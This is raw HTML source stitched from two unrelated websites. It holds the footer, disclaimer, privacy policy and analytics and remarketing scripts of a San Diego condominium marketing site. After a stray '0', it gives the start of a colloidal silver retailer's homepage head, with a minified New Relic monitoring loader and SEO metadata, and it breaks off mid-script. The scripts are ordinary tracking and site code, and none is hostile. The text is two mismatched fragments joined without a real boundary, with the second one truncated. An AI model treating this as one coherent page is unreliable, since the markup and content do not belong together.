et_hover_enabled et_pb_bg_layout_light" href="//pacificgatebybosa.com/en/services-amenities/#services-list">DISCOVER SERVICES</a> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_6 pagination-section et_section_regular"> <div class="et_pb_row et_pb_row_9 pagination-row et_pb_gutters2 et_pb_row_fullwidth"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_10 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_code et_pb_code_0"> <div class="et_pb_code_inner"> <img style="border: 0;visibility:hidden" width="1" height="1" src="//track.strikead.com/web/conv?type=img&target=6587&id=43889" /> </div> <!-- .et_pb_code_inner --> </div> <!-- .et_pb_code --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --> </div> </div> </div> <!-- .entry-content --> </article> <!-- .et_pb_post --> </div> <!-- #main-content --> <footer id="main-footer"> <div id="footer-bottom"> <div class="container greybox clearfix"> <div class="footer-left"> <div class="container clearfix"> <ul class="et-social-icons"> <li class="et-social-icon et-social-facebook"> <a href="//www.facebook.com/PacificGateByBosa/" class="icon"> <span>Facebook</span> </a> </li> <li class="et-social-icon et-social-twitter"> <a href="//twitter.com/pacificgatebosa" class="icon"> <span>Twitter</span> </a> </li> <!--<li class="et-social-icon et-social-google-business"> <a href="https://plus.google.com/112023274779454757917" class="icon"> <span>Google My Business</span> </a> </li>--> <!-- <g:plusone size="medium"></g:plusone> --> </ul> <ul class="footerLanguage"> <li class="lang-item lang-item-11 lang-item-es"><a lang="es-MX" hreflang="es-MX" href="https://pacificgatebybosa.com/es/">Español</a></li> <li class="lang-item lang-item-15 lang-item-zh"><a lang="zh-CN" hreflang="zh-CN" href="https://pacificgatebybosa.com/zh/">中文</a></li> </ul> </div> </div> <div class="footer-right"> <a href="http://thinkbosa.com/" class="bosa-logo" target="blank"> <img src="https://pacificgatebybosa.com/wp-content/uploads/bosa-full-logo.png" alt="" /> </a> <a href="" class="equal-logo" target="blank"> <img src="https://pacificgatebybosa.com/wp-content/uploads/equal-housing-opportunity-logo.png" alt="" /> </a> </div> </div> <!-- .container --> </div> <div class="footer-bottom-center"> <div class="container clearfix"> <p id="privacy-info"> <a href="#" class="popup-link" data-modal-target="#overlayFooter">Disclaimer / Privacy Policy</a><div id="overlayFooter" hidden aria-hidden="true"><h2>General Disclaimer</h2> <p>This is not an offer to sell but intended for information only. Renderings, photography, illustrations, floor plans, amenities, finishes and other information described herein are representative only and are not intended to reflect any specific feature, amenity, unit condition or view when built. The developer/seller reserves the right to change features, amenities and pricing without notice. No representation and warranties are made with regard to the accuracy, completeness or suitability of the information published herein. Represented by S&amp;P Realty Services Corp. DRE # 02012517</p> <p>The photographic images shown are designed to be representative of general orientation and are not in any way designed to represent or guarantee a view from any particular unit or location. Photographic images do not represent any condition at present, or in the future, which may obstruct or impede such views, including but not limited to current and future construction plans by seller or other entities. Neither Seller nor its agents make any guarantee of the existence of any view from any unit or location within the building.</p> <p>By providing Pacific Gate by Bosa with your personal information, you agree that Bosa Development California II, Inc., Pacific Gate’s sales and marketing firms, and designated lender(s) may contact and provide you with information and updates. If at any time you wish to be removed from our contact list, please email <a href="mailto:[email protected]">[email protected]</a> and we will remove your name. Your information will not be sold or given to any other third party.</p> <h2>Privacy Policy</h2> <p>Revised: 03/15/2019<br /> Bosa Development California II, Inc. is committed to protecting any personal information that you provide to us. It is important for you to understand how we treat information about you that we receive via this site.</p> <p>This Privacy Policy applies to the Bosa Development California II, Inc. Website and governs data collection and usage. By using the Bosa Development California II, Inc. Website, you consent to the data practices described in this statement.</p> <p>This Privacy Policy applies only to individual consumers.</p> <p>BY USING THIS, YOU ARE CONSENTING TO THIS PRIVACY POLICY. PLEASE READ IT CAREFULLY</p> <p><strong>Collection and Use of your Personal Information:</strong></p> <p>Bosa Development California II, Inc. and all of its related companies respect your privacy and are committed to handling your personal information in a responsible manner. Bosa Development California II, Inc. understands the need to safeguard sensitive information that you have provided and that you expect privacy and security for your personal and financial affairs. Bosa Development California II, Inc. attempts to minimize the information it collects to that which it reasonably believes is necessary in processing your requests for information, services and other opportunities that may be of interest to you.</p> <p>Generally, you can visit this site without telling us who you are or revealing any information about yourself. Our web servers automatically collect domain names and/or Internet Protocol addresses for marketing research purposes only, not the e-mail addresses or any other personal information, of visitors.</p> <p>This site is not intended for persons under 18 years of age. We do not knowingly solicit or collect personal information from or about minors, and we do not knowingly market our products or services to minors.</p> <p>Bosa Development California II, Inc. solicits your name, address, phone number and e-mail address as well as general information regarding your home buying needs. Bosa Development California II, Inc. may also collect anonymous demographic information, which is not unique to you, such as your ZIP code, age, gender, preferences, interests and favorites. Usually, we use the personal information you provide only to respond to your inquiry. Many homebuyers have expressed interest in receiving appropriate offerings of home-related products and services that may be useful to them. Bosa Development California II, Inc. will, from time to time, disclose the general information you provide to select companies that can provide you with information about such products and services, as described in this Privacy Policy.</p> <p>There is also information about your computer hardware and software that may be automatically collected by Bosa Development California II, Inc. This information can include: your IP address, browser type, domain names, access times and referring Website addresses. This information is not used to personally identify you. Rather, it is aggregated to measure the number of visits, average time spent on the site, pages viewed, etc. We use this information to monitor the use of our site and to improve the content of our site.</p> <p>Bosa Development California II, Inc. keeps track of the Websites and pages our customers visit within Bosa Development California II, Inc. in order to determine what Bosa Development California II, Inc. services are the most popular. This data is used to deliver customized content and advertising within Bosa Development California II, Inc. to customers whose behavior indicates that they are interested in a particular subject area.</p> <p>From time to time, we may establish a business relationship with other businesses whom we believe trustworthy and who have confirmed that their privacy practices are consistent with ours (“Service Providers”). For example, we may contract with Service Providers to provide certain services, such as hosting and maintenance, data storage and management, and marketing and promotions. We only provide our Service Providers with the information necessary for them to perform these services on our behalf. Each Service Provider must agree to use reasonable security procedures and practices, appropriate to the nature of the information involved, in order to protect your Personal Information from unauthorized access, use, or disclosure. Service Providers are prohibited from using personal information other than as specified by us.</p> <p>We may share personal information and other data with businesses controlling, controlled by, or under common control with Bosa Development California II, Inc.. If our company is merged, acquired, or sold, or in the event of a transfer of some or all of our assets, we may disclose or transfer personal information and other data in connection with such transaction. You will have the opportunity to opt out of any such transfer if, in our discretion, it will result in the handling of your personal information in a way that differs materially from this Privacy Policy.</p> <p>After you are no longer an active Bosa Development California II, Inc. customer, Bosa Development California II, Inc. will continue to treat information you have provided as if you were still a customer.</p> <p><strong>Use of Cookies:</strong></p> <p>As is the general practice on the Internet, the Bosa Development California II, Inc. Website uses “cookies” to help you personalize your online experience. A cookie is a small amount of data that is transferred to your browser by a Web server intended to be ready by the server that gave it you. Typically, the cookie functions as a bookmark, returning you to the desired Website.</p> <p>For example, if you personalize Bosa Development California II, Inc. pages, or register with the Bosa Development California II, Inc. website or services, a cookie helps Bosa Development California II, Inc. to recall your specific information on subsequent visits. This simplifies the process of recording your personal information, such as billing addresses, shipping addresses and so on. When you return to the same Bosa Development California II, Inc. website features that you customized will still be there.</p> <p>Cookies cannot be used to run programs or delivery viruses to your computer. Cookies are uniquely assigned to you, and can only be read by a web server in the domain that issued the cookie to you.</p> <p>You have the ability to accept or decline cookies. Most Web browsers automatically accept cookies, but you can usually modify your browser setting to decline cookies if you prefer. If you choose to decline cookies, you may not be able to fully experience the interactive features of the Bosa Development California II, Inc. services or Websites you visit.</p> <p>We may allow third-party companies to serve ads and collect certain anonymous information when you visit this site. These companies may use non-personally identifiable information (e.g. click stream information, web browser type, time and date, subject of advertisements clicked or scrolled over) during your visits to this site and other websites in order to provide advertisements about goods and services likely to be of interest to you. These companies typically use a cookie to collect this information. Our systems do not recognize browser “Do Not Track” signals, but several of our Service Providers who utilize these cookies on this site enable you to opt out of targeted advertising practices. To learn more about these advertising practices or to opt out of this type of advertising, you can visit <a href="//www.networkadvertising.org" target="_blank" rel="noopener">www.networkadvertising.org</a> or <a href="//www.aboutads.info/choices" target="_blank" rel="noopener">www.aboutads.info/choices/</a>. We also provide you with additional tools to opt out of marketing from us in this Privacy Policy.</p> <p>NOTICE TO CALIFORNIA RESIDENTS/YOUR CALIFORNIA PRIVACY RIGHTS:</p> <p>To opt out of sharing your personal information with third parties for their direct marketing purposes, please e-mail us at <a href="mailto:[email protected]">[email protected]</a> and clearly state your request, including your name, mailing address, e-mail address and phone number.</p> <p><strong>Security of Your Personal Information:</strong></p> <p>We maintain strict physical, electronic and administrative safeguards to protect your personal information from unauthorized or inappropriate access. We restrict access to information about you to those Bosa Development California II, Inc. employees who need to know the information to respond to your inquiry or request. Employees who misuse personal information are subject to disciplinary action. However, such precautions do not guarantee, or represent that the use of our Website is protected from viruses, security threats or other vulnerabilities and that your information will always be secure.</p> <p>While Bosa Development California II, Inc. will employ procedures to help ensure that your information is only used for authorized purposes as described above, we cannot make any guarantees with respect to the actions or policies of any third parties.</p> <p><strong>External Links:</strong></p> <p>Our Privacy Policy applies only to your use of the Bosa Development California II, Inc. Website. This Website may contain links to other sites. These sites are governed by their own privacy statements and policies, and Bosa Development California II, Inc. is not responsible for their operations, including but not limited to their information practices. We do not disclose personal information to those operating linked sites and we are not responsible for their practices. Links to other sites do not disclose personal information to those operating linked sites and we are not responsible for their practices. Links to other sites do not imply our endorsement of the materials or policies on those Websites. Bosa Development California II, Inc. encourages you to review the privacy statements of Websites you choose to link to from Bosa Development California II, Inc. so that you can understand how those Websites collect, use and share your information. Bosa Development California II, Inc. is not responsible for the privacy statements or other content on Websites outside of the Bosa Development California II, Inc. and Bosa Development California II, Inc. family of Websites.</p> <p><strong>Trademarks, Copyrights and Restrictions:</strong></p> <p>All content on this Website or any Website owned, operated, licensed and/or controlled by Bosa Development California II, Inc. is protected by copyrights, trademarks, service marks and/or other intellectual property rights. The content on this Website or any Website owned, operated, licensed and/or controlled by Bosa Development California II, Inc. is solely for personal, non-commercial use. Website content may not be copied, distributed, exploited, posted, reproduced, republished, transmitted and/or uploaded in any way for commercial use without the prior written consent of Bosa Development California II, Inc. Without written consent, your use of Website content owned, operated, licensed and/or controlled by Bosa Development California II, Inc. for any purpose other than personal, non-commercial use, is prohibited and violates copyrights, trademarks, service marks and/or other proprietary rights. Bosa Development California II, Inc. reserves the right to deny consent to anyone, for any reason, and at any time.</p> <p><strong>Changes to the Statement:</strong></p> <p>Please check this Privacy Policy periodically to review any changes. If we decide to change this Privacy Policy, we will post any changes on this site. Any such changes shall be immediately effective at the time such changes are posted on the site. By accessing the site following the posting changes to the Privacy Policy, you agree to all such changes.</p> <p><strong>Privacy Contact Information:</strong></p> <p>If you have any questions, concerns or comments about our Privacy Policy you may contact us using the information below:</p> <p>By phone: 619.795.3612<br /> By e-mail: <a href="mailto:[email protected]">[email protected]</a></p> </div> </p> </div> </div> </footer> <!-- #main-footer --> </div> <!-- #et-main-area --> </div> <!-- #page-container --> <script type="text/javascript"> </script> <!-- Google Code for Remarketing Tag --> <!-------------------------------------------------- Remarketing tags may not be associated with personally identifiable information or placed on pages related to sensitive categories. See more information and instructions on how to setup the tag on: //google.com/ads/remarketingsetup ---------------------------------------------------> <script type="text/javascript"> /* <![CDATA[ */ var google_conversion_id = 950305524; var google_custom_params = window.google_tag_params; var google_remarketing_only = true; /* ]]> */ </script> <script type="text/javascript" src="//www.googleadservices.com/pagead/conversion.js"> </script> <noscript> <div style="display:inline;"> <img height="1" width="1" style="border-style:none;" alt="" src="//googleads.g.doubleclick.net/pagead/viewthroughconversion/950305524/?value=0&amp;guid=ON&amp;script=0"> </div> </noscript> <script src="https://secure.adnxs.com/seg?add=15220989&amp;t=1" type="text/javascript"></script><script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/themes/Divi/includes/builder/scripts/frontend-builder-global-functions.js?ver=3.19.6'></script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-includes/js/underscore.min.js?ver=1.8.3'></script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-includes/js/backbone.min.js?ver=1.2.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpApiSettings = {"root":"https:\/\/pacificgatebybosa.com\/wp-json\/","nonce":"8ad1674648","versionString":"wp\/v2\/"}; /* ]]> */ </script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-includes/js/api-request.min.js?ver=5.0.4'></script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-includes/js/wp-api.min.js?ver=5.0.4'></script> <script type='text/javascript'> /* <![CDATA[ */ var mPS2id_params = {"instances":{"mPS2id_instance_0":{"selector":"a[rel='m_PageScroll2id']","autoSelectorMenuLinks":"false","scrollSpeed":1300,"autoScrollSpeed":"true","scrollEasing":"easeInOutExpo","scrollingEasing":"easeInOutCirc","pageEndSmoothScroll":"true","stopScrollOnUserAction":"true","autoCorrectScroll":"false","layout":"vertical","offset":"200","highlightSelector":"","clickedClass":"mPS2id-clicked","targetClass":"mPS2id-target","highlightClass":"mPS2id-highlight","forceSingleHighlight":"false","keepHighlightUntilNext":"false","highlightByNextTarget":"false","appendHash":"false","scrollToHash":"true","scrollToHashForAll":"false","scrollToHashDelay":0,"scrollToHashUseElementData":"true","scrollToHashRemoveUrlHash":"false","disablePluginBelow":0,"adminDisplayWidgetsId":"true","adminTinyMCEbuttons":"true","unbindUnrelatedClickEvents":"true","normalizeAnchorPointTargets":"false"}},"total_instances":"1","shortcode_class":"_ps2id"}; /* ]]> */ </script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/plugins/page-scroll-to-id/js/page-scroll-to-id.min.js?ver=1.6.4'></script> <script type='text/javascript' src='//cdnjs.cloudflare.com/ajax/libs/react/0.14.9/react.min.js?ver=0.14.9'></script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/plugins/photomosaic-for-wordpress/public/js/photomosaic.min.js?ver=2.15.8'></script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/plugins/photomosaic-for-wordpress/public/js/localize.js?ver=2.15.8'></script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/plugins/monarch/js/idle-timer.min.js?ver=1.4.12'></script> <script type='text/javascript'> /* <![CDATA[ */ var monarchSettings = {"ajaxurl":"https:\/\/pacificgatebybosa.com\/wp-admin\/admin-ajax.php","pageurl":"https:\/\/pacificgatebybosa.com\/en\/","stats_nonce":"177a48a92d","share_counts":"1eee27969a","follow_counts":"e57d04de9d","total_counts":"6474c653c6","media_single":"7a204bb698","media_total":"96b3b3e0ca","generate_all_window_nonce":"f5ce7bdab0","no_img_message":"No images available for sharing on this page"}; /* ]]> */ </script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/plugins/monarch/js/custom.js?ver=1.4.12'></script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/themes/Divi/includes/builder/scripts/jquery.mobile.custom.min.js?ver=3.19.6'></script> <script type='text/javascript'> /* <![CDATA[ */ var DIVI = {"item_count":"%d Item","items_count":"%d Items"}; /* ]]> */ </script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/themes/Divi/js/custom.js?ver=3.19.6'></script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/themes/Divi/js/smoothscroll.js?ver=3.19.6'></script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/themes/Divi/includes/builder/scripts/jquery.fitvids.js?ver=3.19.6'></script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/themes/Divi/includes/builder/scripts/waypoints.min.js?ver=3.19.6'></script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/themes/Divi/includes/builder/scripts/jquery.magnific-popup.js?ver=3.19.6'></script> <script type='text/javascript'> /* <![CDATA[ */ var et_pb_custom = {"ajaxurl":"https:\/\/pacificgatebybosa.com\/wp-admin\/admin-ajax.php","images_uri":"https:\/\/pacificgatebybosa.com\/wp-content\/themes\/Divi\/images","builder_images_uri":"https:\/\/pacificgatebybosa.com\/wp-content\/themes\/Divi\/includes\/builder\/images","et_frontend_nonce":"72bd39dd4b","subscription_failed":"Please, check the fields below to make sure you entered the correct information.","et_ab_log_nonce":"175e6ea120","fill_message":"Please, fill in the following fields:","contact_error_message":"Please, fix the following errors:","invalid":"Invalid email","captcha":"Captcha","prev":"Prev","previous":"Previous","next":"Next","wrong_captcha":"You entered the wrong number in captcha.","ignore_waypoints":"no","is_divi_theme_used":"1","widget_search_selector":".widget_search","is_ab_testing_active":"","page_id":"1047","unique_test_id":"","ab_bounce_rate":"5","is_cache_plugin_active":"no","is_shortcode_tracking":"","tinymce_uri":""}; var et_pb_box_shadow_elements = []; /* ]]> */ </script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/themes/Divi/includes/builder/scripts/frontend-builder-scripts.js?ver=3.19.6'></script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/plugins/monarch/core/admin/js/common.js?ver=3.20.2'></script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-includes/js/wp-embed.min.js?ver=5.0.4'></script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/plugins/masterslider/public/assets/js/jquery.easing.min.js?ver=3.2.7'></script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/plugins/masterslider/public/assets/js/masterslider.min.js?ver=3.2.7'></script> <script type="text/javascript">(function() { var expirationDate = new Date(); expirationDate.setTime( expirationDate.getTime() + 31536000 * 1000 ); document.cookie = "pll_language=en; expires=" + expirationDate.toUTCString() + "; path=/; domain=pacificgatebybosa.com"; }());</script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery(".et-social-icon a").attr("target","_blank"); }); // (function(d,config){var script=d.createElement("script");script.setAttribute("async",true);var data=JSON.stringify(config);script.src="//js.buto.tv/video/"+data;var s=d.getElementsByTagName("script")[0];s.parentNode.insertBefore(script,s)})(document,{"object_id":"KbKb4"}) </script> <script type="text/javascript"> document.documentElement.className = 'js'; </script> <script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script> <script type="application/ld+json"> { "@context" : "http://schema.org", "@type" : "Organization", "name" : "Pacific Gate By Bosa", "url" : "https://pacificgatebybosa.com/en/", "logo": "https://pacificgatebybosa.com/wp-content/uploads/LogoTest_02.png", "sameAs" : ["https://www.facebook.com/PacificGateByBosa/", "https://twitter.com/pacificgatebosa"] } </script> <script type="application/ld+json"> { "@context":"http://schema.org", "@type":"LocalBusiness", "name":"Pacific Gate San Diego", "address":{ "@type":"PostalAddress", "streetAddress":"700 First Avenue", "addressLocality":"San Diego", "addressRegion":"CA", "postalCode":"92101", "addressCountry":"US" }, "image":"https://pacificgatebybosa.com/wp-content/uploads/LogoTest_02.png", "logo":"https://pacificgatebybosa.com/wp-content/uploads/LogoTest_02.png", "url":"https://pacificgatebybosa.com/en/", "telephone":"619.795.3612", "priceRange":"$" } </script> </body> </html> <!-- Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/ Object Caching 143/186 objects using disk Page Caching using disk: enhanced Database Caching 18/26 queries in 0.006 seconds using disk Served from: pacificgatebybosa.com @ 2019-05-16 06:35:13 by W3 Total Cache -->
0
<!DOCTYPE html><html lang="en-US" prefix="og: http://ogp.me/ns#" class="no-js no-svg"><head><meta charset="UTF-8"><script type="text/javascript">window.NREUM||(NREUM={}),__nr_require=function(e,n,t){function r(t){if(!n[t]){var o=n[t]={exports:{}};e[t][0].call(o.exports,function(n){var o=e[t][1][n];return r(o||n)},o,o.exports)}return n[t].exports}if("function"==typeof __nr_require)return __nr_require;for(var o=0;o<t.length;o++)r(t[o]);return r}({1:[function(e,n,t){function r(){}function o(e,n,t){return function(){return i(e,[c.now()].concat(u(arguments)),n?null:this,t),n?void 0:this}}var i=e("handle"),a=e(3),u=e(4),f=e("ee").get("tracer"),c=e("loader"),s=NREUM;"undefined"==typeof window.newrelic&&(newrelic=s);var p=["setPageViewName","setCustomAttribute","setErrorHandler","finished","addToTrace","inlineHit","addRelease"],d="api-",l=d+"ixn-";a(p,function(e,n){s[n]=o(d+n,!0,"api")}),s.addPageAction=o(d+"addPageAction",!0),s.setCurrentRouteName=o(d+"routeName",!0),n.exports=newrelic,s.interaction=function(){return(new r).get()};var m=r.prototype={createTracer:function(e,n){var t={},r=this,o="function"==typeof n;return i(l+"tracer",[c.now(),e,t],r),function(){if(f.emit((o?"":"no-")+"fn-start",[c.now(),r,o],t),o)try{return n.apply(this,arguments)}catch(e){throw f.emit("fn-err",[arguments,this,e],t),e}finally{f.emit("fn-end",[c.now()],t)}}}};a("actionText,setName,setAttribute,save,ignore,onEnd,getContext,end,get".split(","),function(e,n){m[n]=o(l+n)}),newrelic.noticeError=function(e,n){"string"==typeof e&&(e=new Error(e)),i("err",[e,c.now(),!1,n])}},{}],2:[function(e,n,t){function r(e,n){if(!o)return!1;if(e!==o)return!1;if(!n)return!0;if(!i)return!1;for(var t=i.split("."),r=n.split("."),a=0;a<r.length;a++)if(r[a]!==t[a])return!1;return!0}var o=null,i=null,a=/Version\/(\S+)\s+Safari/;if(navigator.userAgent){var u=navigator.userAgent,f=u.match(a);f&&u.indexOf("Chrome")===-1&&u.indexOf("Chromium")===-1&&(o="Safari",i=f[1])}n.exports={agent:o,version:i,match:r}},{}],3:[function(e,n,t){function r(e,n){var t=[],r="",i=0;for(r in e)o.call(e,r)&&(t[i]=n(r,e[r]),i+=1);return t}var o=Object.prototype.hasOwnProperty;n.exports=r},{}],4:[function(e,n,t){function r(e,n,t){n||(n=0),"undefined"==typeof t&&(t=e?e.length:0);for(var r=-1,o=t-n||0,i=Array(o<0?0:o);++r<o;)i[r]=e[n+r];return i}n.exports=r},{}],5:[function(e,n,t){n.exports={exists:"undefined"!=typeof window.performance&&window.performance.timing&&"undefined"!=typeof window.performance.timing.navigationStart}},{}],ee:[function(e,n,t){function r(){}function o(e){function n(e){return e&&e instanceof r?e:e?f(e,u,i):i()}function t(t,r,o,i){if(!d.aborted||i){e&&e(t,r,o);for(var a=n(o),u=v(t),f=u.length,c=0;c<f;c++)u[c].apply(a,r);var p=s[y[t]];return p&&p.push([b,t,r,a]),a}}function l(e,n){h[e]=v(e).concat(n)}function m(e,n){var t=h[e];if(t)for(var r=0;r<t.length;r++)t[r]===n&&t.splice(r,1)}function v(e){return h[e]||[]}function g(e){return p[e]=p[e]||o(t)}function w(e,n){c(e,function(e,t){n=n||"feature",y[t]=n,n in s||(s[n]=[])})}var h={},y={},b={on:l,addEventListener:l,removeEventListener:m,emit:t,get:g,listeners:v,context:n,buffer:w,abort:a,aborted:!1};return b}function i(){return new r}function a(){(s.api||s.feature)&&(d.aborted=!0,s=d.backlog={})}var u="nr@context",f=e("gos"),c=e(3),s={},p={},d=n.exports=o();d.backlog=s},{}],gos:[function(e,n,t){function r(e,n,t){if(o.call(e,n))return e[n];var r=t();if(Object.defineProperty&&Object.keys)try{return Object.defineProperty(e,n,{value:r,writable:!0,enumerable:!1}),r}catch(i){}return e[n]=r,r}var o=Object.prototype.hasOwnProperty;n.exports=r},{}],handle:[function(e,n,t){function r(e,n,t,r){o.buffer([e],r),o.emit(e,n,t)}var o=e("ee").get("handle");n.exports=r,r.ee=o},{}],id:[function(e,n,t){function r(e){var n=typeof e;return!e||"object"!==n&&"function"!==n?-1:e===window?0:a(e,i,function(){return o++})}var o=1,i="nr@id",a=e("gos");n.exports=r},{}],loader:[function(e,n,t){function r(){if(!E++){var e=x.info=NREUM.info,n=l.getElementsByTagName("script")[0];if(setTimeout(s.abort,3e4),!(e&&e.licenseKey&&e.applicationID&&n))return s.abort();c(y,function(n,t){e[n]||(e[n]=t)}),f("mark",["onload",a()+x.offset],null,"api");var t=l.createElement("script");t.src="https://"+e.agent,n.parentNode.insertBefore(t,n)}}function o(){"complete"===l.readyState&&i()}function i(){f("mark",["domContent",a()+x.offset],null,"api")}function a(){return O.exists&&performance.now?Math.round(performance.now()):(u=Math.max((new Date).getTime(),u))-x.offset}var u=(new Date).getTime(),f=e("handle"),c=e(3),s=e("ee"),p=e(2),d=window,l=d.document,m="addEventListener",v="attachEvent",g=d.XMLHttpRequest,w=g&&g.prototype;NREUM.o={ST:setTimeout,SI:d.setImmediate,CT:clearTimeout,XHR:g,REQ:d.Request,EV:d.Event,PR:d.Promise,MO:d.MutationObserver};var h=""+location,y={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net",agent:"js-agent.newrelic.com/nr-1123.min.js"},b=g&&w&&w[m]&&!/CriOS/.test(navigator.userAgent),x=n.exports={offset:u,now:a,origin:h,features:{},xhrWrappable:b,userAgent:p};e(1),l[m]?(l[m]("DOMContentLoaded",i,!1),d[m]("load",r,!1)):(l[v]("onreadystatechange",o),d[v]("onload",r)),f("mark",["firstbyte",u],null,"api");var E=0,O=e(5)},{}]},{},["loader"]);</script><meta name="google-site-verification" content="GIyrmQp1YS-V8qHltjBSb3ZJMpSu1lltNfZlmU53lZg" /><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="http://gmpg.org/xfn/11"><link rel="shortcut icon" href="https://sovereignsilver.com/wp-content/uploads/2019/03/favicon.ico" type="image/x-icon"><link rel="icon" href="https://sovereignsilver.com/wp-content/uploads/2019/03/favicon.ico" type="image/x-icon"> <script>(function(html){html.className = html.className.replace(/\bno-js\b/,'js')})(document.documentElement);</script> <link type="text/css" media="all" href="https://sovereignsilver.com/wp-content/uploads/autoptimize/css/autoptimize_14dadc10562492c864a1be0f9359928d.css" rel="stylesheet" /><link type="text/css" media="only screen and (max-width: 768px)" href="https://sovereignsilver.com/wp-content/uploads/autoptimize/css/autoptimize_dcb2de333eec7ab4ae31385ed8d6a393.css" rel="stylesheet" /><title>Sovereign Silver &middot; The Finest in Colloidal Silver Products</title> <script data-cfasync="false" type="text/javascript">// var gtm4wp_datalayer_name = "dataLayer"; var dataLayer = dataLayer || []; var gtm4wp_use_sku_instead = 0; var gtm4wp_id_prefix = ''; var gtm4wp_remarketing = false; var gtm4wp_eec = 1; var gtm4wp_classicec = false; var gtm4wp_currency = 'USD'; var gtm4wp_product_per_impression = 0; //</script> <meta property="og:title" content="Home"><meta property="fb:app_id" content="529576650555031"><meta property="og:type" content="article"><meta property="og:url" content="https://sovereignsilver.com/"><meta property="og:site_name" content="Sovereign Silver"><meta property="article:published_time" content="2017-08-03T06:17:54+00:00"><meta property="article:modified_time" content="2019-05-09T10:53:51+00:00"><meta property="og:updated_time" content="2019-05-09T10:53:51+00:00"><meta name="twitter:title" content="Home"><meta name="twitter:description" content=""><meta name="twitter:image" content=""><meta name="twitter:creator" content=""><meta name="twitter:card" content="summary"><meta name="description" content="Committed to producing the safest, purest and most effective colloidal silver Bio-Active Hydrosols and First Aid Gel - compromising nothing in the process."/><link rel="canonical" href="https://sovereignsilver.com/" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:description" content="Committed to producing the safest, purest and most effective colloidal silver Bio-Active Hydrosols and First Aid Gel - compromising nothing in the process." /><meta name="twitter:title" content="Sovereign Silver &middot; The Finest in Colloidal Silver Products" /><meta name="twitter:site" content="@sovereignsilver" /><meta name="twitter:image" content="https://sovereignsilver.com/wp-content/uploads/2017/11/SS-Logo_Transparent.png" /><meta name="twitter:creator" content="@sovereignsilver" /><meta name="google-site-verification" content="V-_Yp_juejDFl9_S6MbIOZnLbJewiPgvU68eJGgnTb4" /><meta name="p:domain_verify" content="f3e70e188a6734befc1c5dde400adc0f" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://sovereignsilver.com/#organization","name":"Sovereign Silver","url":"https://sovereignsilver.com/","sameAs":["https://www.facebook.com/sovereignsilver/","https://www.instagram.com/sovereignsilver/","https://www.linkedin.com/company/natural-immunogenics-corp/","https://www.pinterest.com/sovereignsilver/","https://twitter.com/sovereignsilver"],"logo":{"@type":"ImageObject","@id":"https://sovereignsilver.com/#logo","url":"https://sovereignsilver.com/wp-content/uploads/2017/11/SS-Logo_Transparent.png","width":282,"height":111,"caption":"Sovereign Silver"},"image":{"@id":"https://sovereignsilver.com/#logo"}},{"@type":"WebSite","@id":"https://sovereignsilver.com/#website","url":"https://sovereignsilver.com/","name":"Sovereign Silver","publisher":{"@id":"https://sovereignsilver.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://sovereignsilver.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://sovereignsilver.com/#webpage","url":"https://sovereignsilver.com/","inLanguage":"en-US","name":"Sovereign Silver &middot; The Finest in Colloidal Silver Products","isPartOf":{"@id":"https://sovereignsilver.com/#website"},"about":{"@id":"https://sovereignsilver.com/#organization"},"datePublished":"2017-08-03T06:17:54+00:00","dateModified":"2019-05-09T14:53:51+00:00","description":"Committed to producing the safest, purest and most effective colloidal silver Bio-Active Hydrosols and First Aid Gel - compromising nothing in the process."}]}</script> <link rel='dns-prefetch' href='//sovereignsilver.com' /><link rel='dns-prefetch' href='//cdn.rawgit.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="Sovereign Silver &raquo; Feed" href="https://sovereignsilver.com/feed/" /> <script type="text/javascript">window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/sovereignsilver.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px 